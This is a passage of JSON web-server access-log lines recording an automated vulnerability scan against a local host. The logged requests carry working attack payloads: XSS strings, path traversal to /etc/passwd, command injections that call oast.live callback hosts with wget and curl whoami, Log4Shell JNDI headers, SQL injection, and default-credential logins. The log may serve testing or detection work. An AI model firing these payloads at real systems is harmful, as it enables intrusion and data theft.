Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.561","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.bz2 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.442","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.png HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.836","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.397","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/altair HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.410","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.479","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/log/error.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.472","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.498","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:28 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.516","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mongo-express/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.972","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.379","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.123","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /editor.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.441","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/api/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.320","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.371","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.544","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.430","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.488","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.431","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.345","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://c9oms3gsmpve1ijt0mc0g3nddm5m69drz.oast.live)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.370","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /db/admin/system.users HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /libraries/joomla/database/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.466","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.354","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mysql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.390","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/86 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.854","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.395","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /default/showLogon.do HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.890","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/explorer HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.438","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"j_username=weblogic&j_password=Oracle@123&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.427","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.jpg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0AAT&TFORM\x00\x00\x03\xAFDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xAC\xFF\xFF\xDE\xBF\x99 !\xC8\x91N\xEB\x0C\x07\x1F\xD2\xDA\x88\xE8k\xE6D\x0F,q\x02\xEEI\xD3n\x95\xBD\xA2\xC3\x22?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\x0A\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0Fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8A\xE6\xE1\xB17\xD9\x7F*\x89\x00BG44\x00\x00\x00\x04\x01\x0F\xF9\x9FBG44\x00\x00\x00\x02\x02\x0AFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\x0A\x09(Copyright \x22\x5C\x0A\x22 . qx{curl `whoami`.c9oms3gsmpve1ijt0mc0ozy95p5dd4i1s.oast.live} . \x5C\x0A\x22 b \x22) ) \x0A\x0D\x0A------WebKitFormBoundaryIMv3mxRg59TkFSX5--\x0D\x0A\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /uploads/user HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.229","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /jkstatus/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.242","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.457","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.486","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.433","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@c9oms3gsmpve1ijt0mc09feogs1hgqssz.oast.live", "http_referer":"http://c9oms3gsmpve1ijt0mc041k9i3o76scnj.oast.live/ref", "request_method":"GET", "http_x_forwarded_for":"spoofed.c9oms3gsmpve1ijt0mc0usbod39g4n3oc.oast.live"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /console/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.638","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /VisionHubWebApi/api/Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.476","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.489","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /users.sql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.767","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"{\x22solution\x22: \x22Facade\x5C\x5CIgnition\x5C\x5CSolutions\x5C\x5CMakeViewVariableOptionalSolution\x22, \x22parameters\x22: {\x22variableName\x22: \x22cve20213129\x22, \x22viewFile\x22: \x22AA\x22}}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /_ignition/execute-solution HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.324","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/87 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.497","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sql.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.533","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:29 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.541","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.488","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v4/graph HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.489","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"j_username=weblogic&j_password=weblogic123&j_character_encoding=UTF-8","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /console/j_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.490","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.483","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"${jndi:${lower:d}n${lower:s}://${env:hostName}.c9oms3gsmpve1ijt0mc0dphz4ygmnmubf.oast.live}"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"requester=login&request=login¶ms=[{\x22name\x22:\x22input_id\x22,\x22value\x22:\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\x22},{\x22name\x22:\x22input_passwd\x22,\x22value\x22:\x22PASSWORD\x22},{\x22name\x22:\x22device_id\x22,\x22value\x22:\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\x22},{\x22name\x22:\x22checked\x22,\x22value\x22:false},{\x22name\x22:\x22login_key\x22,\x22value\x22:\x22\x22}]","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /http/index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.256","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.499","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.499","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///etc.children.json/FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.416","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:30 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /s3cmd.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.341","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 